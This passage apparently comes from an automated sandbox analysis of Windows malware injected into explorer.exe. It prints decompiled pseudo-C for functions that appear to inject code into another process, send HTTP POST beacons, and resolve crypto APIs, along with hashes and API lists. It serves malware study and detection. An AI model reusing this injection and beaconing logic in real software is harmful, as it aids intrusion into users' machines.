                              • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                              • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                            • SysFreeString.OLEAUT32(?), ref: 0008DF82
                            • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 1290676130-1412513891
                            • Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                            • Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0xc2f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0xc2f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































                            0x0008c6c6
                            0x0008c6cd
                            0x0008c6cf
                            0x0008c6d1
                            0x0008c6d3
                            0x0008c6d6
                            0x0008c6d9
                            0x0008c6dc
                            0x0008c6df
                            0x0008c6e2
                            0x0008c6e5
                            0x0008c6ef
                            0x0008c6f2
                            0x0008c6f9
                            0x0008c6fe
                            0x0008c6fe
                            0x0008c704
                            0x0008c706
                            0x0008c70f
                            0x0008c8b5
                            0x0008c8b9
                            0x0008c8be
                            0x0008c8c4
                            0x0008c8c7
                            0x0008c8c7
                            0x0008c8cb
                            0x0008c8d0
                            0x0008c8d5
                            0x0008c8e2
                            0x0008c8e2
                            0x0008c8eb
                            0x0008c8ed
                            0x0008c8f5
                            0x0008c8f5
                            0x0008c8fc
                            0x0008c8fc
                            0x0008c718
                            0x0008c719
                            0x0008c71e
                            0x0008c724
                            0x0008c726
                            0x0008c727
                            0x0008c728
                            0x0008c72d
                            0x0008c72e
                            0x0008c738
                            0x00000000
                            0x00000000
                            0x0008c743
                            0x0008c74d
                            0x0008c757
                            0x0008c75a
                            0x0008c760
                            0x0008c767
                            0x0008c768
                            0x0008c769
                            0x0008c772
                            0x0008c773
                            0x0008c774
                            0x0008c776
                            0x0008c779
                            0x0008c77c
                            0x0008c77f
                            0x0008c782
                            0x0008c78e
                            0x0008c7b0
                            0x0008c7b8
                            0x0008c7bb
                            0x0008c7c6
                            0x0008c7c6
                            0x0008c7b8
                            0x0008c7cc
                            0x0008c7d5
                            0x0008c7d7
                            0x0008c7d8
                            0x0008c7da
                            0x0008c7db
                            0x0008c7dc
                            0x0008c7dd
                            0x0008c7e1
                            0x0008c7e8
                            0x0008c7e9
                            0x0008c7f1
                            0x0008c8b2
                            0x00000000
                            0x0008c7f7
                            0x0008c7f7
                            0x0008c7f9
                            0x0008c7fa
                            0x0008c7ff
                            0x0008c800
                            0x0008c801
                            0x0008c802
                            0x0008c803
                            0x0008c809
                            0x0008c80a
                            0x0008c80f
                            0x0008c810
                            0x0008c818
                            0x00000000
                            0x00000000
                            0x0008c82e
                            0x0008c830
                            0x0008c837
                            0x00000000
                            0x00000000
                            0x0008c848
                            0x0008c84e
                            0x0008c856
                            0x0008c859
                            0x0008c85f
                            0x0008c86f
                            0x0008c87b
                            0x0008c880
                            0x0008c886
                            0x0008c896
                            0x0008c8a2
                            0x0008c8aa
                            0x00000000
                            0x0008c8aa

                            APIs
                            • RegisterClassExA.USER32 ref: 0008C785
                            • CreateWindowExA.USER32 ref: 0008C7B0
                            • DestroyWindow.USER32 ref: 0008C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                            • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 3082384575-2319545179
                            • Opcode ID: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                            • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                            • Opcode Fuzzy Hash: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                            • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0xc2f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















                            0x00085f82
                            0x00085f92
                            0x00085f9c
                            0x000860d0
                            0x000860c3
                            0x00000000
                            0x000860c5
                            0x000860d7
                            0x00086098
                            0x00000000
                            0x00086098
                            0x00085fa2
                            0x00085faa
                            0x00085fb1
                            0x00085fb3
                            0x00000000
                            0x00085fc6
                            0x00085fc6
                            0x00085fcc
                            0x00085fd2
                            0x00085fe2
                            0x00085fe7
                            0x00085fef
                            0x00085ff7
                            0x00086013
                            0x00086018
                            0x0008601b
                            0x0008601d
                            0x0008601f
                            0x0008602c
                            0x00086035
                            0x0008603e
                            0x00086043
                            0x00086044
                            0x00086052
                            0x0008605c
                            0x0008606d
                            0x00086072
                            0x00086079
                            0x00086080
                            0x00086083
                            0x0008608f
                            0x00086090
                            0x0008609c
                            0x000860a5
                            0x000860a9
                            0x000860b7
                            0x000860ba
                            0x000860c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x000860c1
                            0x00086092
                            0x00086097
                            0x00000000
                            0x00085ff7

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                            • SetLastError.KERNEL32(000000AA), ref: 000860D7
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                            • GetLastError.KERNEL32 ref: 00085FEF
                            • memset.MSVCRT ref: 00086013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 1203100507-3610097158
                            • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                            • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0xc2fe58
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0xc2fe58
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0xc2fe58
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0xc2fe58
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0xc2fe58
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0xc2fe58
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0xc2fe58
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0xc2fe58
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0xc2fe58
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0xc2fe58
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0xc2fe58
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0xc2fe58
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0xc2fe58
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0xc2fe58
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0xc2fe58
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0xc2fe58
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0xc2fe58
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0xc2fe58
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                            0x0008e671
                            0x0008e683
                            0x0008e68c
                            0x0008e696
                            0x0008e69a
                            0x0008e6ab
                            0x0008e6c2
                            0x0008e6cf
                            0x0008e6dc
                            0x0008e6e9
                            0x0008e6ec
                            0x0008e6f1
                            0x0008e6f6
                            0x0008e6f8
                            0x0008e700
                            0x0008e70b
                            0x0008e712
                            0x0008e71e
                            0x0008e721
                            0x0008e72f
                            0x0008e732
                            0x0008e738
                            0x0008e739
                            0x0008e73b
                            0x0008e744
                            0x0008e745
                            0x0008e74a
                            0x0008e750
                            0x0008e75a
                            0x0008e75c
                            0x0008e761
                            0x0008e761
                            0x0008e770
                            0x0008e77f
                            0x0008e783
                            0x0008e792
                            0x0008e795
                            0x0008e79a
                            0x0008e79e
                            0x0008e7a5
                            0x0008e7ac
                            0x0008e7b4
                            0x0008e7bc
                            0x0008e7c3
                            0x0008e7cb
                            0x0008e7d3
                            0x0008e7da
                            0x0008e7e2
                            0x0008e7ea
                            0x0008e7ff
                            0x0008e80c
                            0x0008e80e
                            0x0008e813
                            0x0008e813
                            0x0008e81a
                            0x0008e82b
                            0x0008e830
                            0x0008e832
                            0x0008e832
                            0x0008e846
                            0x0008e858
                            0x0008e85a
                            0x0008e85d
                            0x0008e862
                            0x0008e862
                            0x0008e869
                            0x0008e878
                            0x0008e87c
                            0x0008e8ba
                            0x0008e8bf
                            0x0008e8c7
                            0x0008e8cc
                            0x0008e8d7
                            0x0008e8dd
                            0x0008e8e7
                            0x0008e8ea
                            0x0008e8f3
                            0x0008e8f8
                            0x0008e8f8
                            0x0008e901
                            0x0008e94a
                            0x0008e94c
                            0x0008e953
                            0x0008e954
                            0x0008e957
                            0x0008e95d
                            0x0008e961
                            0x0008e962
                            0x0008e967
                            0x0008e969
                            0x0008e96f
                            0x0008e984
                            0x0008e98c
                            0x0008e9c1
                            0x0008e9c6
                            0x0008e9cb
                            0x00000000
                            0x0008e9cd
                            0x0008e98e
                            0x0008e990
                            0x0008e990
                            0x0008e999
                            0x0008e99c
                            0x0008e99e
                            0x0008e9a0
                            0x0008e9a6
                            0x0008e9a6
                            0x0008e9ab
                            0x0008e9ad
                            0x0008e9b4
                            0x0008e9b4
                            0x00000000
                            0x0008e9b7
                            0x0008e971
                            0x0008e979
                            0x00000000
                            0x0008e903
                            0x0008e903
                            0x0008e909
                            0x0008e90f
                            0x0008e912
                            0x00000000
                            0x0008e912
                            0x0008e901
                            0x0008e87e
                            0x0008e884
                            0x0008e888
                            0x0008e889
                            0x0008e88e
                            0x0008e890
                            0x0008e896
                            0x0008e8b4
                            0x0008e8b4
                            0x00000000
                            0x0008e8b4
                            0x0008e898
                            0x0008e8a2
                            0x0008e8a4
                            0x0008e8a5
                            0x0008e8aa
                            0x0008e8ac
                            0x0008e8b2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e86b
                            0x0008e86b
                            0x0008e914
                            0x0008e914
                            0x0008e91a
                            0x0008e91d
                            0x00000000
                            0x0008e91d
                            0x0008e81c
                            0x0008e81c
                            0x0008e91f
                            0x0008e91f
                            0x0008e925
                            0x0008e928
                            0x00000000
                            0x0008e928
                            0x0008e81a
                            0x0008e785
                            0x0008e92a
                            0x0008e92d
                            0x0008e92f
                            0x0008e932
                            0x0008e935
                            0x0008e93e
                            0x0008e943
                            0x00000000
                            0x00000000
                            0x0008e947
                            0x00000000
                            0x0008e947
                            0x0008e754
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                            • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                            0x000916c1
                            0x000916c8
                            0x000916d1
                            0x000916d5
                            0x00091750
                            0x00000000
                            0x00091752
                            0x000916e3
                            0x000916e5
                            0x000916ea
                            0x00000000
                            0x00000000
                            0x000916f2
                            0x000916f4
                            0x000916f9
                            0x00000000
                            0x00000000
                            0x00091703
                            0x00091707
                            0x00000000
                            0x00000000
                            0x00091709
                            0x0009170e
                            0x00091710
                            0x00091711
                            0x00091715
                            0x0009171b
                            0x00000000
                            0x00000000
                            0x00091726
                            0x0009172f
                            0x00091733
                            0x00000000
                            0x00000000
                            0x00091735
                            0x00091737
                            0x0009173f
                            0x00091741
                            0x00091742
                            0x0009174a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                            • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
